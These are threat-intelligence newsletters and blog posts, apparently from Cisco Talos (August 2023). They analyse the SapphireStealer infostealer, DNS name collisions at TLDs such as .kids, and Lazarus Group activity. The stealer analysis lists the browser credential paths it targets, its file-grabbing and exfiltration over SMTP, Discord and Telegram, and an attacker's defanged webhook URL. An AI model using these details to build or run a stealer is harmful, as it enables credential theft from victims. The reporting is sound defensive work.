A new open-source information stealer called ‘SapphireStealer’ has been observed across public malware repositories with increasing frequency. Plus, watch a new series of videos on the year so far in the threat landscape.

Thursday, August 31, 2023 14:08

Welcome to this week’s edition of the Threat Source newsletter.

I’m covering for Jon this week whilst he takes some well-deserved holiday. What’s on my mind this week? Well, apart from a new horror film that I just read about called “Slotherhouse” where the killer is, um, a sloth (I predict nothing but a masterpiece), there are a couple of things on my mind relating to open-source.

Firstly, on the bad actor side of things, we’re seeing more and more bad guys take advantage of the availability of tools that have been added to public malware sites, such as the infostealer “SaphireStealer” which you can read about below.

When I spoke to Cisco Talos’ Head of Outreach, Nick Biasini, about the biggest trends 2023 so far, he called out how attackers are increasingly using malicious open-source tooling. This has been a large part of the reason we are seeing a continuous fracturing of the ransomware and extortion landscape, as threat actors find what they need online, and then adapt these tools to suit their needs, and in many cases add on anti-detection mechanisms.

Speaking of 2023 trends, I just uploaded a new playlist of 1–2-minute long videos featuring Nick’s thoughts and explanations on some of the biggest threats we’ve seen so far this year - including the evolution of ransomware, the rise in commercial spyware, and supply chain attacks. Check out the playlist. As a preview, here's Nick talking about the evolution of ransomware in 2023:

On the flip side, open-source is of course one of the most important ways in which security defenders can learn, upskill, and share their findings with the community. That’s one of the reasons why Talos creates and releases open-source software, for free.

Just in case you don’t know about our open-source tools, which have been developed by some of the smartest brains on the planet, you should check them out. We have around 27 tools which are available to download on our website at talosintelligence.com/software and on GitHub. The latest and greatest of these is the NIM-IDA-FLIRT Generator tool.

Oh, I just read that “Slotherhouse” will not only feature a killer sloth, it’s called Alpha, and their weapon of choice is a samurai sword. One ticket please.

****The one big thing****

SapphireStealer, an open-source information stealer, has been increasingly observed across public malware repositories since its initial release in December 2022. SapphireStealer is an example of a new type of information stealer, which is mostly designed to facilitate the theft of various browser credential databases and files that may contain sensitive user information.

While infostealers have been around for a very long time, Talos has recently seen an increase in the emergence of new stealers being offered for sale or rent on various underground forums and marketplaces.

**Why do I care?**

As is often the case following the release of a new open-source malware codebase, threat actors have acted quickly, and began to experiment. Some threat actors have even extended SaphireStealer to support added functionality, and used other tooling to make the detection of SapphireStealer infections more difficult (again, another increasing trend that we’re seeing across the threat landscape). Infostealers remain a popular choice for financially motivated threat actors, as they provide a simple means to compromise and distribute sensitive information to adversaries.

**So now what?**

A comprehensive blog written by Edmund Brumaghin covers the background behind SapphireStealer, and our research on the tool, including a case study where we saw multiple failures on the part of the threat actor to maintain sound operational security. The blog includes Snort SIDs, and indicators of compromise.

****Top security headlines of the week****

*   **Operation “Duck Hunt" proactively removes Qakbot malware from 700,000 infected machines.** In one of the largest operations of its kind, federal law enforcement took decisive action against one of the most widely used and longstanding botnets. According to the U.S Department of Justice, these efforts resulted in Qakbot being “neutralized” from hundreds of thousands of devices. According to TechCrunch, “The Department of Justice also announced the seizure of more than $8.6 million in cryptocurrency from the Qakbot cybercriminal organization, which will now be made available to victims”. Dark Reading TechCrunch
*   **What’s in a name? Strange behaviors at top-level domains creates uncertainty in DNS.** When Google introduced the new “.zip” Top Level Domain (TLD) on May 3, 2023, it ignited a firestorm of controversy as security organizations warned against the confusion that was certain to occur. Talos researcher Jaeson Schultz recently wrote about the consequences of Google’s decsion, including how, in the worst case scenario, confusion over whether some name is a public DNS name, or another private resource can cause sensitive data to fall into the hands of unintended recipients. Talos blog.
*   **OpenAI rolls out a business edition of ChatGPT, promising “enterprise-grade security”**. OpenAI says it is making a commitment not to use client-specific prompts and data in the training of its models. SecurityWeek writes that “the security-centric features of the new ChatGPT Enterprise are meant to address ongoing business concerns about the protection of intellectual property and the integrity of sensitive corporate data when using LLM (large language model) algorithms.” SecurityWeek

****Can’t get enough Talos?****

*   Beers with Talos Ep. #138  “I’m going to breach you off.” “Not if I breach you off first!” (Where Barbie meets offensive security)
*   Talos Takes Ep. #152 Carrying out incident response in-person vs. virtually (hear about the positives and negatives of each approach)
*   Blog: Black Hat USA 2023 NOC: Network Assurance (a great write up about how Cisco and Talos helped to protect the network during Black Hat USA 2023).
*   Security Stories Ep. #69 Preparing for a cybersecurity incident, with Jeremy Maxwell (hear from a Cisco Talos Incident Response customer about how his organization proactively prepares for cybersecurity incidents within a highly regulated industry.

**Upcoming events where you can find Talos**

**LABScon** **(Sept. 20 - 23)**

Scottsdale, Arizona

_Vitor Ventura gives a presentation that’s a detailed account and timeline of one such mercenary organization, from almost bankrupt to having a fully working spyware targeting iOS and Android with one-click zero-day exploit._

**Grace Hopper Celebration** **(Sept. 26 - 29)**

Orlando, Florida

_Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

_Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking._

****Most prevalent malware files from Talos telemetry over the past week****

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91

MD5: 7bdbd180c081fa63ca94f9c22c457376

VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details

Typical Filename: c0dwjdi6a.dll

Claimed Product: N/A

Detection Name: Trojan.GenericKD.33515991

SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507

MD5: 2915b3f8b703eb744fc54c81f4a9c67f

VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507/details

Typical Filename: VID001.exe

Claimed Product: N/A

Detection Name: Win.Worm.Coinminer::1201

SHA 256: 1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6

MD5: 4c9a8e82a41a41323d941391767f63f7

VirusTotal: https://www.virustotal.com/gui/file/1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6/details

Typical Filename: !!Mreader.exe

Claimed Product: N/A

Detection Name: Win.Dropper.Generic::sheath

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91

MD5: 7bdbd180c081fa63ca94f9c22c457376

VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details

Typical Filename: c0dwjdi6a.dll

Claimed Product: N/A

Detection Name: Trojan.GenericKD.33515991

SHA 256: 7bf7550ae929d6fea87140ab70e6444250581c87a990e74c1cd7f0df5661575b

MD5: f5e908f1fac5f98ec63e3ec355ef6279

VirusTotal: https://www.virustotal.com/gui/file/7bf7550ae929d6fea87140ab70e6444250581c87a990e74c1cd7f0df5661575b/details

Typical Filename: IMG001.exe

Claimed Product: N/A

Detection Name: Win.Dropper.Coinminer::tpd

New open-source infostealer, and reflections on 2023 so far

SapphireStealer, an open-source information stealer, has been observed across public malware repositories with increasing frequency since its initial public release in December 2022.
Information-stealing malware like SapphireStealer can be used to obtain sensitive information, including corporate credentials, which are often resold to other threat actors who leverage the access for

*   SapphireStealer, an open-source information stealer, has been observed across public malware repositories with increasing frequency since its initial public release in December 2022.
*   Information-stealing malware like SapphireStealer can be used to obtain sensitive information, including corporate credentials, which are often resold to other threat actors who leverage the access for additional attacks, including operations related to espionage or ransomware/extortion.
*   We assess with moderate confidence that multiple entities are using SapphireStealer, who have improved and modified the original code base separately, extending it to support additional data exfiltration mechanisms leading to the creation of several variants.
*   In some cases, SapphireStealer appears to be delivered as part of a multi-stage infection process, with threat actors leveraging open-source malware downloaders like FUD-Loader to deliver SapphireStealer to potential victims.

**SapphireStealer goes open-source, attackers take notice**

Information stealers have become increasingly popular across the threat landscape over the past several years. While these threats have been around for a very long time, Cisco Talos has recently observed an increase in the emergence of new stealers being offered for sale or rent on various underground forums and marketplaces. Stealers are often seen as an attractive option for financially motivated threat actors, as they provide a simple means to compromise and distribute sensitive information and account-related details to adversaries. These credentials often include corporate account credentials, access tokens and other data that can then be used to further compromise corporate networks. In many cases, the credential logs generated by information stealers are monetized and the network access they provide is sold to other threat actors who may use them to begin operating toward various post-compromise mission objectives, such as espionage or ransomware/extortion.

SapphireStealer is an example of a new information stealer, primarily designed to facilitate the theft of various browser credential databases and files that may contain sensitive user information. SapphireStealer’s codebase was published on GitHub on Dec. 25, 2022.

As is often the case following the release of a new open-source malware codebase, threat actors acted quickly, beginning to experiment with this stealer, extending it to support additional functionality, and using other tooling to make the detection of SapphireStealer infections more difficult.

Newly compiled versions of SapphireStealer began being uploaded to public malware repositories beginning in mid-January 2023, with consistent upload activity being observed through the first half of 2023. Compilation artifacts associated with these samples indicate that this malware codebase is currently being used by multiple threat actors. Multiple variants of this threat are already in the wild, and threat actors are improving on its efficiency and effectiveness over time.  

While most of the samples featured forged compilation timestamps, using the date on which the samples were initially uploaded to public repositories and compilation artifacts like PDB pathways allowed us to cluster malware activity and identify distinct development activity occurring.

**SapphireStealer enables simple but effective credential and data theft**

SapphireStealer is an information stealer that was written in .NET. It offers straightforward but effective functionality capable of stealing sensitive information from infected systems including:

*   Host information.
*   Screenshots.
*   Cached browser credentials.
*   Files stored on the system that match a predefined list of file extensions.

When the malware is initially executed, it first attempts to determine if any existing browser processes are running on the system. It queries the currently running process list for any process names that match the following list:

*   chrome
*   yandex
*   msedge
*   opera

If any matching processes are detected, the malware uses Process.Kill() to terminate them. This code execution for Google Chrome is shown below.

Next, the malware calls Chromium.Get() to check for various browser database file directories under %APPDATA% or %LOCALAPPDATA%. The malware uses a hard-coded list of paths to identify the presence of credential databases for the following browser applications:

*   Chrome
*   Opera
*   Yandex
*   Brave Browser
*   Orbitum Browser
*   Atom Browser
*   Kometa Browser
*   Microsoft Edge
*   Torch Browser
*   Amigo
*   CocCoc
*   Comodo Dragon
*   Epic Privacy Browser
*   Elements Browser
*   CentBrowser
*   360 Browser

The malware creates a working directory at the following location to stage the data that will ultimately be exfiltrated:

%TEMP%\sapphire\work

The contents of any credential databases that are discovered are dumped. This information is then stored in a text file within the malware’s working directory called Passwords.txt.

Next, the malware attempts to capture a screenshot from the system and stores it within the same working directory within a file called Screenshot.png.

The malware creates a new subdirectory called \`Files\` within the malware’s working directory. A file grabber is then executed that attempts to locate any files stored within the victim’s Desktop folder that match a list of file extensions. The list varied across analyzed samples, but an example list is shown below:

*   .txt
*   .pdf
*   .doc
*   .docx
*   .xml
*   .img
*   .jpg
*   .png

Once the file grabber has completed execution, the malware then creates a compressed archive called log.zip containing all of the logs that were previously written to the malware’s working directory.

This data is then transmitted to the attacker via Simple Mail Transfer Protocol (SMTP) using credentials defined in the portion of code responsible for crafting and sending the message.

The following host-related information is collected and included in the body of the email message:

*   IP address
*   Hostname
*   Screen resolution
*   OS version and CPU architecture
*   ProcessorId
*   GPU Information

Once the logs have been successfully exfiltrated, the malware then deletes the working directory created earlier and terminates execution.

**SapphireStealer extended to support additional exfiltration methods**

Since initial samples began being uploaded to public malware repositories and scanning platforms, we’ve observed several notable modifications made by various threat actors. Most of the development effort appears to have been focused on facilitating more flexible data exfiltration and alerting for attackers that achieve new SapphireStealer infections. As this malware is open-source and being used by multiple distinct threat actors, much of this development activity has occurred independently and new functionality is not present in sample clusters associated with other threat actors.

In one case, we observed a SapphireStealer sample where the data collected using the previously described process was exfiltrated using the Discord webhook API, a method we previously highlighted here.

In this case, the Discord webhook URL (SendLog.url) was:

hxxps[:]//discord[.]com/api/webhooks/1123664977618817094/La_3GaXooH42oGRiy8o7sazh1Cg0V_mzkH67VryfSB1MCOlYee1_JPMCNsfOTji7J9jO

In several cases, we also observed SapphireStealer samples that featured the ability to alert attackers to newly acquired infections by transmitting the log data via the Telegram posting API.

In addition, we also observed variations in the file extensions being targeted for collection and exfiltration by the FileGrabber functionality present within SapphireStealer. While some were minimal, only containing a few file extensions, others contained a myriad of different file formats that the attacker could obtain.

Likewise, earlier versions of SapphireStealer featured redundant code execution, repeated superfluous executions of the same operations multiple times, and overall inefficiencies. During our analysis of other SapphireStealer samples over time, we observed repeated evidence that various threat actors had taken steps to streamline the malware’s operations, refactor the code significantly, and otherwise improve upon the core functionality of the stealer.

**FUD-Loader used in multi-stage infections**

In several cases, we observed threat actors attempting to leverage a malware downloader, called FUD-Loader which was also made available via the same GitHub account. This downloader was initially committed to GitHub on January 2, 2023, shortly after the initial code commit of SapphireStealer. Since its release, it’s been used by a variety of threats during the initial stages of the infection process to retrieve additional binary payloads from attacker-controlled distribution servers.

This loader, like SapphireStealer, was written in .NET and features fairly simplistic operations. It is essentially responsible for leveraging HTTP/HTTPS communications to retrieve additional executables from attacker-controlled infrastructure, saving the retrieved content to disk, and then executing it to continue the infection process.

In most of the cases where this loader was used, it retrieved the SapphireStealer binary payloads being hosted on the infrastructure described in the next section, allowing us to attribute those samples to the same threat actor.

Throughout the course of 2023, we have also observed this downloader being used to deliver various other threats such as DcRat, njRAT, DarkComet, AgentTesla and more.

**A case study in operational security (OPSEC) failure**

In one cluster of malware activity we analyzed, we observed multiple failures on the part of the threat actor to maintain sound operational security. In one sample, we observed the presence of the following Program Database (PDB) pathway still present post-compilation:

C:\Users\roman\OneDrive\Рабочий стол\straler\net452\new_game.pdb

This sample was configured to use SMTP for data exfiltration and leveraged the following hardcoded credentials.

These credentials were also hardcoded into another sample we analyzed.

We observed that this second sample featured a different PDB, which contained a specific typographical error in the PDB pathway.

D:\C# proect\Sapphire\obj\Debug\Sapphire.pdb

An earlier sample featured the same PDB pathway and the same typographical error. In this case, the threat actor hardcoded personally identifiable SMTP account information for data exfiltration.

Looking for additional accounts that featured the handle/alias “romanmaslov200” led us to a variety of personal accounts that may be associated with the threat actor, such as an account for Steam, a popular video game storefront.

Two of these three samples were also observed being hosted at the following URL at various times:

In addition to the aforementioned Steam account, we also identified a matching account on a Russian language freelance forum. This account was being used to advertise freelance web development services. The user profile also lists the domain observed hosting SapphireStealer samples and various dependency components retrieved for parsing credential databases and exfiltrating the data.

One of the byproducts of readily available and open-source malware codebases is that the barrier to entry into financially motivated cybercrime has continued to decrease over time. This trend has become apparent when analyzing campaigns run by individuals or groups that demonstrate inexperience in establishing operational security throughout the various stages of the attack lifecycle. While it may take less operational expertise to conduct information stealer attacks, they can be extremely damaging to corporate environments as the data stolen is often leveraged for additional attacks at a later time.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort SIDs are applicable to this threat: 62243-62247.

**Orbital Queries**

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here.

**Indicators of Compromise**

IOCs for this research can also be found at our Github repository here

SapphireStealer: Open-source information stealer enables credential and data theft

Google introduced the new “.zip” Top Level Domain (TLD) on May 3, 2023, igniting a firestorm of controversy as security organizations warned against the confusion that was certain to occur. 
When clicking on a name that ends in “.zip” are people intending to open an archive

Tuesday, August 29, 2023 08:08

Google introduced the new “.zip” Top Level Domain (TLD) on May 3, 2023, igniting a firestorm of controversy as security organizations warned against the confusion that was certain to occur.

When clicking on a name that ends in “.zip” are people intending to open an archive file or an internet URL? The confusion that arises between the ZIP file extension and the ZIP TLD is called a “name collision” — and is not a new phenomenon.

According to ICANN, a name collision occurs “when a user unknowingly accesses a name that has been delegated in the public DNS when the user's intent is to access a resource identified by the same name in a private network.” Name collisions have been an issue dating back years. Back in 2013 when ICANN introduced several new TLDs they also introduced a Name Collision Occurrence Management Framework to deal with the problem.

Users and programs alike depend on DNS to navigate the internet. In the worst case, confusion over whether some name is a public DNS name or another private resource can cause sensitive data to fall into the hands of unintended recipients.

****Controlled interruption****

To alert network administrators to potential name collisions in DNS, the Name Collision Occurrence Management Framework prescribes a “controlled interruption.” In this approach, a TLD publishes special DNS records — instructions that provide information about a domain — at the root level. Some examples include mail exchange (MX), service location (SRV), text (TXT), and address (A) records. Networks whose internal names collide with the TLD receive DNS replies containing the name “your-dns-needs-immediate-attention.<TLD>” and IP address 127.0.53.53. Presumably, seeing this in the logs would allow administrators to address the problem.

****The .kids TLD is not alright****

One TLD that appears to publish controlled interruption DNS records is .kids. For example, querying DNS for the MX or SRV record for the .kids TLD yields the ‘your-dns-needs-immediate.attention.kids’ name in response. For some reason, however, contrary to the framework from ICANN, the .kids TLD publishes no A record at the root level. The .kids TLD formerly did have the 127.0.53.53 A record, per the controlled interruption policy from ICANN, but for whatever reason .kids stopped offering the A record IP address back in January of 2023. This suggests that after the controlled interruption policy was implemented it was either changed or never fully removed.

Hostname lookups on various DNS record types in the .kids TLD.

One critical piece of information that was left out of the ICANN name collision framework was that the TLD must ensure the name, ‘your-dns-needs-immediate-attention.<TLD>’ is not available for public registration. Unfortunately, no such restriction was in place at the .kids TLD, and Cisco Talos successfully registered the domain name:

    **your-dns-needs-immediate-attention.kids**

Talos set up an internet server to log all activity related to this name, and immediately we received a barrage of HTTP requests from systems running Microsoft’s “System Center Configuration Manager.”

SCCM requests are issued from various endpoints using a name in .kids.

System Center Configuration Manager is a tool used by administrators to remotely manage computer systems across a network. According to Microsoft:

“Configuration Manager helps you deliver more effective IT services by enabling:

*   Secure and scalable deployment of applications, software updates, and operating systems.
*   Real-time actions on managed devices.
*   Cloud-powered analytics and management for on-premises and internet-based devices.
*   Compliance settings management.
*   Comprehensive management of servers, desktops, and laptops.”

Because Talos registered the domain name "your-dns-needs-immediate-attention.kids", we were able to masquerade as a trusted system. Networks using .kids names could be tricked into trusting our system to relay internal mail, dictate configuration management settings, and more.

Systems attempting to relay email through Talos to various email addresses @kids.

Cisco Talos reached out to the administrators of the .kids TLD informing them of the problem. The TXT, MX and SRV DNS records at the .kids TLD DNS server were subsequently removed.

****Zombified DNS names****

Name collisions aren’t the only situations that can cause a TLD to act strangely. Some do not respond properly when presented with names that have expired or never existed. In these TLDs, unregistered and expired domain names still resolve to IP addresses. Some of these TLDs even publish MX records and collect emails for the names in question.

Typically, when a domain name is not actively registered, a DNS query for that name will generate the response,‘NXDOMAIN’ which tells the user that a particular name does not exist. NXDOMAIN DNS responses are useful for a number of reasons. Email list managers, for example, might use NXDOMAIN responses from DNS to help prune invalid recipients and recipients that cannot receive mail from their mailing lists.

****.ws ccTLD — Western Samoa****

The .ws country-level TLD (ccTLD) was created for Western Samoa and marketed as a global TLD that could stand for “website.” When a domain name at the .ws TLD expires (or if it is a new name that was never registered), DNS servers will never return an \`NXDOMAIN\` response. Rather, the .ws TLD continues to hand out an IP address and MX server:

The mail.hope-mail.com server accepts mail for any unregistered domain name at the .ws ccTLD.

****.vg ccTLD — The Virgin Islands****

The .vg country-level TLD belongs to the British Virgin Islands and, like the .ws ccTLD, when a name at .vg expires (or if it is a new name that was never registered), DNS servers will respond with an IP address. However, unlike the .ws TLD, .vg doesn’t provide an MX server for the domain name.

On the surface, this would seem like a good thing that no MX record is provided. However, according to RFC 5321, when a domain name associated with an email address has no MX records, “the address is treated as if it was associated with an implicit MX RR, with a preference of 0, pointing to that host.” In other words, SMTP servers will assume that mail should be delivered to the IP address associated with the A record for a domain.

In fact, the IP address handed out by the .vg TLD does listen on port 25 and accepts connections for non-existent domain names. Fortunately, attempts to deliver mail to a non-existent domain will fail with a 550 error message:

Unsuccessfully attempting to send mail to the implicit MX offered by .vg.

****.ph ccTLD — The Philippines****

The .ph ccTLD belongs to the Philippines, and instead of the expected NXDOMAIN response, DNS requests for expired or non-existent names at .ph will return the IP address 45\[.\]79\[.\]222\[.\]138.

Unlike the .vg ccTLD, there is no mail server listening on the IP address provided by the .ph TLD. Attempts to deliver mail to an expired .ph domain name will fail, but the domain name itself will still resolve, which can still be problematic in some situations.

****Second-level “TLDs”****

Besides the official list of TLDs sanctioned by ICANN, there are also quite a few second-level registrations that people have turned into their own “TLDs,” that also do not respond properly to zombified DNS names. For example, sites such as “com.de” are technically second-level registrations at the .de TLD, but they offer registrations at the third level, billing themselves as “Germany’s newest domain extension.”

Queries for expired/non-existent domains at com.de return both an IP address and a mail server.

Fortunately, the mail server mail.cash9.com will not accept mail for non-existent domain names.

Unsuccessfully attempting to send mail to the MX offered by .com.de.

A similar situation exists at the “TLD” us.org, which markets itself as “a new domain extension for organizations, projects, websites and people with a higher standard of social responsibility and ethical behavior.”

When a DNS query is issued to us.org for a name that has expired or does not exist, an IP address is returned along with several MX servers:

MX records for the .us.org domain.

The DNS records at us.org are set up in an interesting way. Although they return MX records for our non-existent domain name, if you look carefully at the MX records returned by the DNS we can see that the lowest preference MX is simply a dot \[.\]. This is a NULL MX setting and it means that there are no mail servers for the domain. Well-behaved mail servers will recognize the NULL MX preference and cease attempting to deliver mail to that address. Poorly behaved mail servers, on the other hand, may latch onto a lower preference MX and connect to googlemail.com to attempt email delivery.

What's in a name?  Strange behaviors at top-level domains creates uncertainty in DNS

The latest activity from Lazarus Groups, .gov domains scamming people out of "V-Bucks" and more in this week's edition.

Thursday, August 24, 2023 14:08

Welcome to this week’s edition of the Threat Source newsletter.

I have no idea how “Fortnite” keeps coming up in this newsletter, but here we are again.

Even though the game/metaverse has never been bigger, it had been a while since I had heard about “V-Bucks” scams. V-Bucks are the in-game virtual currency “Fortnite” uses to sell character skins and other visual elements.

After the game’s initial surge in popularity, scams claiming to get players easy V-Bucks were all over the place in the form of fake advertisements, phishing emails, scams and YouTube videos. And as the game has only become more ubiquitous, so have scams and cyber attacks centered around the game.

Wired reported last week that a central network of bad actors is responsible for compromising legitimate domains (some of them with the .gov and .edu top-level domains) and using them to trick players into sharing personal information or downloading malicious apps. This widespread campaign targets players of “Fortnite” and “Roblox,” another half-game, half-metaverse.

These compromised sites promised to send rewards in these games to players in exchange for clicking on a link, downloading a file or filling out a form.

This led me down another rabbit hole of potential Fortnite scams that I hadn’t thought about, which are the thousands of knockoffs that exist.

For some reason, just searching “Fortnite” on the Google Play store doesn’t return any results, but when you search “Fortnite game,” users are served with tons of apps of questionable origin and legitimacy. The real “Fortnite” can only be downloaded from the Epic Games Store, owned by the game’s publisher and the subject of a long legal saga with Apple.

The second-most-popular result for “Fortnite game” is something called “Battle Royale Chapter 4 Season3” published on the store by the auspiciously named “EPic Games,” which wreaks of the same vibes as a typosquatted domain.

Some of the top reviews for the app also seem to be written by bots, and in one case, the most recent 5-star review came from a user who appeared to credit ChatGPT with writing the text.

I’m not blaming anyone or any company for the existence of these types of scams, I just think it’s worth noting to parents and potential players that bad actors are still trying to backpack off the popularity of these games. It likely doesn’t fall on the companies making these games to regulate this space and make sure scammers aren’t capitalizing off their popularity — after all, no one blames the bank if an attacker uses their name in a phishing email to steal login credentials.

But I also don’t know who it falls to, either. As users, it again falls on us to just be hyper-vigilant and prepared, knowing attackers will try to leverage anything, even fake money used to buy virtual hot dog suits, to scam people.

**The one big thing**

The infamous Lazarus Group APT is back at it again with two new remote access trojans. The North Korean state-sponsored group is well known for using a variety of malware to generate revenue for the hermit government and trying to spy on their various adversaries. Now, they have two new RATs that Talos recently discovered, largely based on open-source tools or previously leaked malware code. Lazarus Group is increasingly using the Qt framework to create their malware, which poses new challenges for defenders. It increases the complexity of the malware’s code, making human analysis more difficult.

**Why do I care?**

Any time the Lazarus Group is active, everyone should take notice. This is one of the most high-profile APTs on the threat landscape right now, and they’ve shown that they will not hesitate to exhaust all options to try to generate money for North Korea’s government. With this specific set of RATs, they are smaller than Lazarus’ usual payloads, which makes their operations slimmer, faster and harder to detect. Once infected, Lazarus Group can carry out a wide range of malicious actions on targets, ranging from deploying ransomware to completely lock down targeted machines, stealing personal information, or hijacking hardware for cryptocurrency mining.

**So now what?**

Both the blogs we published Thursday morning include guidance on remediating these threats. The use of open-source tooling can sometimes make it easier for security researchers to spot Lazarus Group activity, and in the case of the two new RATs, Talos has a wide range of Snort and ClamAV detection available.

**Top security headlines of the week**

**The FBI warned that North Korean state-sponsored actors are preparing to cash out up to $40 million worth of cryptocurrency after multiple heists.** The Lazarus Group reportedly is holding onto six separate crypto wallets holding a combined 1,580 Bitcoin over the course of 24 hours earlier this week. This APT is known for carrying out data breaches and cyber attacks to generate funding for the country’s illegal nuclear weapons program. The Lazarus Group previously stole $60 million and $37 million in cryptocurrency from Alphapo and CoinsPaid, respectively, in July, and $100 million from Atomic Wallet in June. In its alert, the FBI shared the Bitcoin addresses associated with the attacks so cryptocurrency agencies could examine their blockchain data and “be vigilant in guarding against transactions directly with, or derived from the addresses.” (TechCrunch, SecurityWeek)

**A previously unknown hacking group appears to be behind a supply chain attack targeting roughly 100 computers located in Hong Kong and other areas of Asia.** Security researchers attributed the attack to a new actor known as “Carderbee” that is currently not tied to any state affiliations. The attackers exploited the legitimate Cobra DocGuard software — made by a Chinese software company — to deliver a malicious software update that compromised the machines. Because only about 2,000 machines worldwide use DocGuard, researchers believe it is a highly targeted attack looking to compromise specific victims. Each attack tried to deploy the Korplug (the predecessor of PlugX) backdoor onto victim computers. (CyberScoop, The Record by Recorded Future)

**The Clop threat actor was responsible for more than a third of all ransomware attacks in July,** according to multiple industry reports. Clop continues to carry out follow-on attacks associated with its massive breach of the MOVEit file transfer software. More than 4 million Colorado residents may have been affected because of the MOVEit breach, with the state’s Department of Health Care Policy & Financing (HCPF) disclosing this week that it was affected through a technology partner, IBM. HCPF stated that the MOVEit data breach leaked sensitive data but did not compromise the state agency’s internal systems. As of this week, some estimates state that more than 730 organizations have been affected by the MOVEit breach. (Cybersecurity Dive, CPO Magazine)

**Can’t get enough Talos?**

*   Talos Takes Ep. #151: Hacktivism is quietly growing, especially when it comes to Russia's invasion of Ukraine
*   Three vulnerabilities in NVIDIA graphics driver could cause memory corruption
*   Generating FLIRT signatures for Nim and other non-C programming languages
*   Cisco: Bringing More Intelligence to Bear on the Threat Landscape

**Upcoming events where you can find Talos**

**LABScon** **(Sept. 20 - 23)**

Scottsdale, Arizona

> Vitor Ventura gives a presentation that’s a detailed account and timeline of one such mercenary organization, from almost bankrupt to having a fully working spyware targeting iOS and Android with a one-click zero-day exploit.

**Grace Hopper Celebration** **(Sept. 26 - 29)**

Orlando, Florida

> Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

> Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

**Most prevalent malware files from Talos telemetry over the past week**

**SHA 256:** 24283c2eda68c559f85db7bf7ccfe3f81e2c7dfc98a304b2056f1a7c053594fe  
**MD5:** 49ae44d48c8ff0ee1b23a310cb2ecf5a  
**Typical Filename:** nYzVlQyRnQmDcXk  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440  
**MD5:** ef6ff172bf3e480f1d633a6c53f7a35e  
**Typical Filename:** iizbpyilb.bat  
**Claimed Product:** N/A  
**Detection Name:** Trojan.Agent.DDOH

**SHA 256:** 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf  
**MD5:** 2cfc15cb15acc1ff2b2da65c790d7551  
